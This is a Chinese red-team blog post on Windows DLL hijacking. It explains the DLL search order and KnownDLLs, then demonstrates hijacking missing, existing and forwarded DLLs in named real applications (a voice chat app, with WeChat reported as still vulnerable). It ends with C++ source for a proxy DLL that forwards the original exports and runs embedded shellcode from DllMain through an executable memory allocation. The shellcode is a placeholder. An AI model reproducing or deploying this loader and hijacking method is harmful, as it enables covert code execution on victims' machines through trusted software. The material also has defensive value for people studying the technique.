无处不在的dll劫持

admin 2022年4月29日19:04:00评论181 views字数 2571阅读8分34秒阅读模式

前言

dll劫持是比较经典,也是比较老的技术,但到目前位置依然能用。

具体原理就是某些exe需要加载dll,而查找dll的目录顺序如下:

  • 应用程序所在目录;
  • 系统目录SYSTEM32目录;
  • 16位系统目录即SYSTEM 目录。该项只是为了向前兼容的处理,可以不考虑;
  • Windows目录。通常是C:Windows;
  • 加载 DLL 时所在的当前目录;
  • 环境变量PATH中所有目录。需要注意的是,这里不包括App Paths注册表项指定的应用程序路径。

所以如果一个dll不在应用程序所在目录,那么我们可以在应用程序所在目录放一个我们自己的dll,名称改为要加载dll的名称,这样当程序启动时,程序会加载我们自己的dll。当然这里只是简单的说了一种情况,某些情况下,即便正常dll存在,我们也可以通过dll劫持转发的方式劫持,目前不少厂商已经通过hash,MD5校验或数字签名验证等方式确保加载的dll为自己的dll,这会是即便你找到了相关可利用的dll劫持但还是失败的原因之一。

Windows 7之后:

微软为了更进一步的防御系统的DLL被劫持,将一些容易被劫持的系统DLL写进了一个注册表项中,那么凡是此项下的DLL文件就会被禁止从EXE自身所在的目录下调用,而只能从系统目录即SYSTEM32目录下调用。注册表路径如下:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerKnownDLLs

本机win11的knownDLLs

无处不在的dll劫持


分析一个应用程序是否存在劫持系统DLL的漏洞,通常需要几个步骤:

  1. 启动应用程序
  2. 使用Process Monitor等类似软件查看该应用程序启动后加载的动态链接库。
  3. 从该应用程序已经加载的DLL列表中,查找在上述“KnownDLLs注册表项”中不存在的DLL。
  4. 编写从上一步获取到的DLL的劫持DLL。
  5. 将编写好的劫持DLL放到该应用程序目录下,重新启动该应用程序,检测是否劫持成功。

劫持不存在的DLL

最近游戏玩的比较多,用开黑啦试一下

使用process Monitor Filterkaiheila.exe进程进行监控

无处不在的dll劫持


发现在kaiheila.exe目录下对一个不存在的dll进行QueryOpen操作无处不在的dll劫持


查看栈发现也确实有loadlibrary操作无处不在的dll劫持

我们自己编译一个最简单的dll无处不在的dll劫持
将生成后的dll移到kaihela.exe目录下无处不在的dll劫持
然后将名称改为powrprof.dll无处不在的dll劫持
重新启动开黑啦,证明确实存在dll劫持。无处不在的dll劫持

劫持已经存在的DLL

这里找到一个成功加载的

无处不在的dll劫持


这里先把原来程序正常的dll改名为libEGL1.dll,然后将我们自己的dll改名为libEGL.dll无处不在的dll劫持

然后再重新执行程序,这里同样是弹出了窗口

无处不在的dll劫持

转发式劫持

能够成功劫持,但劫持后影响正常程序运行

无处不在的dll劫持

基本原理如下:无处不在的dll劫持
这里可以使用工具AheadLib无处不在的dll劫持
使用生成的cpp文件编译,将原来的dll改名为voice_helperOrg.dll无处不在的dll劫持生成一个64位的payload

无处不在的dll劫持



#include <Windows.h>
#include <stdlib.h>


#pragma comment(linker, "/EXPORT:RegisterHookListener=voice_helperOrg.RegisterHookListener,@1")
#pragma comment(linker, "/EXPORT:RemoveAllListeners=voice_helperOrg.RemoveAllListeners,@2")
#pragma comment(linker, "/EXPORT:StartHelperService=voice_helperOrg.StartHelperService,@3")
#pragma comment(linker, "/EXPORT:StopHelperService=voice_helperOrg.StopHelperService,@4")
HANDLE hThread = NULL;
typedef void(__stdcall* JMP_SHELLCODE)();
/* length: 894 bytes */
unsigned char shellcode[] = "SHELLCODE";


DWORD WINAPI jmp_shellcode(LPVOID pPara)
{
    LPVOID lpBase = VirtualAlloc(NULLsizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(lpBase, shellcode, sizeof(shellcode));
    JMP_SHELLCODE jmp_shellcode = (JMP_SHELLCODE)lpBase;
    jmp_shellcode();
    return 0;
}

BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        DisableThreadLibraryCalls(hModule);
        hThread = CreateThread(NULL0, jmp_shellcode, 000);

    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
    }

    return TRUE;
}

uu语音上线

无处不在的dll劫持

目前wx最新版仍然有相同的问题无处不在的dll劫持

加下方wx,拉你进群一起学习

无处不在的dll劫持

往期推荐

CVE-2021–26855与CVE-2021–27065分析及复现

Windows环境下的调试器探究

构建API调用框架绕过杀软hook

bypass Bitdefender

windows下的反调试探究

绕过360实现lsass转储

一次简单的内网渗透靶场实战

惊!微软竟爆出如此漏洞

java agent使用与agent内存马

ring0下使用内核重载绕过杀软hook


无处不在的dll劫持

原文始发于微信公众号(红队蓝军):无处不在的dll劫持

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月29日19:04:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   无处不在的dll劫持http://cn-sec.com/archives/961573.html

发表评论

匿名网友 填写信息